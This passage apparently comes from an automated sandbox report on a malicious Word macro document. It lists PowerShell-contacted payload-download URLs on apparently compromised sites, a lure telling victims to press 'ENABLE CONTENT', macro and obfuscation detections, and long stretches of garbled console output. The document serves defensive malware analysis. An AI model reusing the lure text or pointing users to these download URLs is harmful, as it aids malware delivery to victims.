Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/aco-corten/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/acrilico-com-iluminacao/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/acrilico/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/design-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/design/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/displays-luminosos/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/letra-caixa/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/projeto-persolalizado/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/site-institucional-www-metronetwork-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/site-institucional-www-quality-esp-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/site-institucional-www-ximpressoes-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/trabalho-8-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/web-site-www-btenergia-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/web-site-www-cemundodosaber-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/web-site-www-weissarquitetura-com/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/www-btenergia-com-br/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/servicos/branding-de-marca/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/servicos/comunicacao-visual/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/servicos/e-commerce/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/servicos/limpeza-de-fachadas/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/servicos/marketing-digital/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/servicos/web-design/
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-conte
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/css/main.css
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/img/cover.webp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/img/favicon.webp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/themes/b2bcom/assets/js/main.js
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/ARTE_FOTO-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/ARTE_FOTO-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/COC-SITE.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/WEB-1-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/WEB-1-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/02/slideshow3.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/4.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/The-Stockton-Cafe-4-320x200.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/logo-site-1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/03/logo-site.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/04/ARQUITETURA-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/04/ARQUITETURA-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/4.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/SITE3-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/SITE4-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/logo-site-2.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/08/mockDrop_iMac-on-a-table-1-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/2-1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/6.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/LETRA-CAIXA.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-100x100.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-120x120.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/10/Screenshot_2.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/10/ld-pierre-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_MISSAO.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_VALORES.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_VIS
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/MDF.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/METRO-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/XIMPRESSOES-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/03/quadro-led-luminoso-cerveja-redondo-duff-beer-44cm-
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/1.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/2.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/3.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/04/4.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/06/fachada_02_site.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/3.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/mockDrop_iMac-on-a-table-2-450x400.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/nizan-guanaes-propmark-55-anos-450x300.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/11/o-que-e-e-commerce.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/10.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/11.png
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/ACR
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/Subway-sec-450x300.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-content/uploads/2020/12/Subway-sec.jpg
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-includes/js/wp-embed.min.js
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/wp-json/
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmpString found in binary or memory: https://cairocad.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in binary or memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmpString found in binary or memory: https://cairocad.comp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:300
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117416892.0000000003C20000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-admin/kK/
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-admin/kK/P
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.comp
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/channel/UCrYEOm4ym22murrhb0WGC2A
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 7856
Source: unknownProcess created: Commandline size = 7765
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7765
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FF00282FE9
Source: v22Pc0qA.doc.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Dk5att0cu_9jsb, Function Document_open
Source: v22Pc0qA.doc.docOLE indicator, VBA macros: true
Source: 00000004.00000002.2110752047.00000000002D6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.2111601657.0000000001C34000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal96.troj.evad.winDOC@6/14@8/6
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$2Pc0qA.doc.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC985.tmpJump to behavior
Source: v22Pc0qA.doc.docOLE indicator, Word Document stream: true
Source: v22Pc0qA.doc.docOLE document summary: title field not present or empty
Source: v22Pc0qA.doc.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exeConsole Write: ............3........................... .=.......=.....................................#...............................h.......5kU.............
Source: C:\Windows\System32\msg.exeConsole Write: ............3...h...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......X.v.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j....................................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j..... ..............................}..v............0.{.............X.v.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E........................3.j....................................}..v....P.......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j....8.v.............................}..v............0.{...............v.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............b2.j....................................}..v.....L......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............b2.j..... ..............................}..v....(M......0.{...............v.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....................................}..v....@.......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....................................}..v....@.......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....................................}..v....@.......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....X.......0.{..............Bv.....(.......h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j....................................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.6.............}..v............0.{..............Bv.....$.......h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. .y.............................................................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X ..............................}..v..... ......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v.....'......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X(..............................}..v.....(......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v...../......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X0..............................}..v.....0......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v.....7......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E..........................j....X8..............................}..v.....8......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. .y.............................................................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X@..............................}..v.....@......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v.....G......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....XH..............................}..v.....H......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v.....O......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....XP..............................}..v.....P......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v.....W......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....XX..............................}..v.....X......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. .y.............................................................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X`..............................}..v.....`......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v.....g......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....Xh..............................}..v.....h......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v.....o......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....Xp..............................}..v.....p......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................R..j.... Fv.............................}..v.....w......0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....Xx..............................}..v.....x......0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B.............................. .y.............................................................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B......K....................... .y.............................................................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....X...............................}..v............0.{.............xCv.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............R..j.... Fv.............................}..v............0.{.............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j....X...............................}..v............0.{.............xCv.............h...............
